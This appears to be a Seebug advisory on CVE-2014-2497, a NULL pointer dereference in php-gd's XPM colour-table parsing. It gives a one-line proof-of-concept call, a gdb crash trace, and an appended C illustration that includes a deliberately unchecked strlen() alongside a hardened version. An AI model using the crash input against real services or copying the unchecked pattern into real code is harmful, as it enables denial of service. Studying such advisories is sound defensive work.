SSV:61811
Published: Mar 17, 2014
Author: Root
Source: www.seebug.org

php-gd 'gdxpm.c' NULL pointer dereference denial-of-service vulnerability

EPSS: 0.01 (Low)
Percentile: 83.5%

Bugtraq ID: 66233
CVE ID: CVE-2014-2497

php-gd is an image-processing extension library.

The gdImageCreateFromXpm() function in php-gd's 'gdxpm.c' contains a security vulnerability: while parsing the XPM colour table it calls strlen() on image.colorTable[i].c_color, which can be NULL, so a NULL pointer dereference occurs. An attacker can exploit this to crash any application linked against the library.

Affected versions: php-gd <= v5.4.17-2

No detailed solution is currently available:
http://www.php.net/


php > imagecreatefromxpm("monochome-poc.xpm");

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39		movdqu	(%rdi), %xmm1
(gdb) bt
#0  __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1  0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2  0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, 
    ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3  0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4  0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5  0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, 
    string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6  0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7  0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8  0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364
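The gdb dump shows why the crash happens: entry "D" carries only a monochrome key (m_color), so its c_color is NULL and strlen() on it faults. The following is an added illustration, not code from php-gd or libgd: a stand-in colour-table struct with the fields the dump displays, the unchecked strlen() pattern the advisory describes, and a hardened lookup that falls back through the other keys (the fallback order c > g > g4 > m is an assumption for this example) and reports a malformed table instead of dereferencing NULL. The table is constructed to mirror the six entries in the session.

```c
#include <string.h>

/* Stand-in for the libXpm colour-table entry shown in the gdb dump above
 * (hypothetical layout: only the fields the trace displays). */
typedef struct {
    const char *string;   /* the pixel characters, e.g. "A" */
    const char *symbolic; /* symbolic name, not a colour value */
    const char *m_color;  /* monochrome key */
    const char *g4_color; /* 4-level greyscale key */
    const char *g_color;  /* greyscale key */
    const char *c_color;  /* colour key; NULL when the XPM omits it */
} xpm_color_entry;

/* The pattern the advisory describes: strlen() on c_color with no NULL
 * check. Calling this on an entry like "D" below dereferences NULL. */
size_t unchecked_color_len(const xpm_color_entry *e) {
    return strlen(e->c_color);
}

/* Hardened lookup: fall back through the other keys (assumed order
 * c > g > g4 > m) and report absence instead of crashing. */
const char *pick_color_key(const xpm_color_entry *e) {
    const char *keys[] = { e->c_color, e->g_color, e->g4_color, e->m_color };
    for (size_t i = 0; i < sizeof keys / sizeof keys[0]; i++)
        if (keys[i] != NULL && keys[i][0] != '\0')
            return keys[i];
    return NULL; /* caller must treat the image as malformed */
}

/* Returns the index of the first entry with no usable key, or -1 if
 * every entry can be resolved to a colour string. */
int first_bad_entry(const xpm_color_entry *table, int n) {
    for (int i = 0; i < n; i++)
        if (pick_color_key(&table[i]) == NULL)
            return i;
    return -1;
}

/* Constructed table mirroring the six entries in the gdb session:
 * entry "D" carries only a monochrome key, exactly the crashing case. */
const xpm_color_entry demo_table[] = {
    { "A", NULL, NULL,      NULL, NULL, "#FFFFFF" },
    { "B", NULL, NULL,      NULL, NULL, "#CCCCCC" },
    { "C", NULL, NULL,      NULL, NULL, "#999999" },
    { "D", NULL, "#666666", NULL, NULL, NULL      },
    { "E", NULL, NULL,      NULL, NULL, "#333333" },
    { "F", NULL, NULL,      NULL, NULL, "#000000" },
};
const int demo_table_len = 6;
```

A loader built on pick_color_key() resolves "D" to "#666666", and a table with an entry that has no key at all is rejected up front by first_bad_entry() rather than reaching strlen().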